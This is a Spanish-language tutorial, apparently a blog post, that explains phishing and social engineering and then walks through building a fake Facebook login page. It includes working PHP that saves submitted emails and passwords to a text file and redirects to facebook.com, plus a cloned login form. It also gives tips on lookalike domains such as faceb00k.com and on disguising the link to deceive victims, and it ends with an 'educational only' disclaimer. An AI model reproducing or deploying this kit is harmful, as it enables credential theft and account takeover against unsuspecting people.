Ataques de ingeniería social + phishing

Phishing se refiere a la captación de datos personales realizada de manera ilícita o fraudulenta a través de internet. Es una palabra del inglés que se origina de su homófona “fishing”, que significa ‘pesca’, en alusión al objetivo del phishing: pescar datos, ver “quién muerde el anzuelo”. El phishing es ejecutado por un phisher o'pescador

Este es un tutorial básico sobre cómo hacer una página de phishing.

El phishing es una página falsa de inicio de sesión utilizada para acceder a la cuenta de alguien.

Cuando alguien inicia sesión en la página falsa de inicio de sesión, la contraseña se envía a usted.

 por ejemplo

La tarjeta de crédito, la tarjeta de débito, la contraseña bancaria y la contraseña de las redes sociales. 

En este método, el atacante clona el sitio web oficial específico y lo envía al objetivo. .
siempre que el objetivo visite el sitio web de phishing del atacante e ingrese su información confidencial. 

El atacante recibirá la misma información confidencial.

Qué es ingeniería social?

El término ingeniería social hace referencia al arte de manipular personas para eludir

los sistemas de seguridad. Esta técnica consiste en obtener información de los

usuarios por teléfono, correo electrónico, correo tradicional o contacto directo. Los

atacantes de la ingeniería social usan la fuerza persuasiva y se aprovechan de la

inocencia del usuario haciéndose pasar por un compañero de trabajo, un técnico o un

administrador

Veamos un ejemplo de phishing en Facebook.

El atacante clona el sitio web facebook.com y crea la página de facebook maliciosa y hospeda el sitio web en cualquier alojamiento gratuito como web000hostapp o compre un dominio de cualquier registrador

Facebook phishing se parece a: - faceb00k.com

veamos cuál es el resultado si el objetivo inicia sesión a través de nuestra página de phishing e ingrese su información, como se muestra a continuación, y haga clic en el resultado de ingreso a continuación

Una vez que el objetivo haya alcanzado la entrada, será redirigido a su https://www.facebook.com compartir a continuación

Prueba

Codigo php

<?php

file_put_contents("credencial.txt", "Account: " . $_POST['email'] . " Pass: " . $_POST['pass'] . "\n", FILE_APPEND);

header('Location: https://facebook.com/');

exit();

?>

Codigo html 

<html>

<title>Log into Facebook | Facebook</title>

<link rel="icon" type="png" sizes="16x16" href="icon.png">

<meta name="description" content="Iniciar sesiónto Facebook to start sharing and connecting with your friends, family, 

and people you know." />

<form method="post" action="login.php" class="bj bk" id="login_form" novalidate="1">

<ul class="bl bm bn">

<li class="bm">

<h3 class="bo bp bq">Correo electronico o telefono</h3>

<input autocorrect="off" autocapitalize="off" type="email" class="br bs bt" name="email" value="">

</li><li class="bm">

<div>

<h3 class="bo bp bq">Constrasena</h3>

<input autocorrect="off" autocapitalize="off" class="br bs bu bv" name="pass" type="password">

</div>

</li>

 <div class="upage vertical-col left" id="mainpage">

<li class="bm">

<input value="Iniciar sesion" type="submit" name="Iniciar sesion" class="m n bw bx by">

<!--facebook-->

</li>

 </div>

</ul>

<div>

</div>

<input type="hidden" name="_fb_noscript" value="true">

</form>

</html>

Ahora vea en el script anterior el objetivo, guarde el nombre de usuario y la contraseña en txt.

Cómo engañar a la victima

Disfrazar tu enlace que es el enlace a su página de phishing. Cuando la gente entra para que, recibirá la contraseña en el archivo txt que se crea cuando alguien escribe algo en él. 

https://www.facebook.com/videocall/incall/?peer_id=

ADVERTENCIA: NO INTENTE HACER UN ATAQUE SIN EL PERMISO DE PROPIETARIO DEL SITIO WEB. ES UN PROPÓSITO EDUCATIVO SOLAMENTE. NO ES RESPONSABLE DE NINGÚN TIPO DE PROBLEMA ILEGAL. 

 PERMANECE LEGAL. 

GRACIAS! 

 Si tienes algún problema, deja un comentario.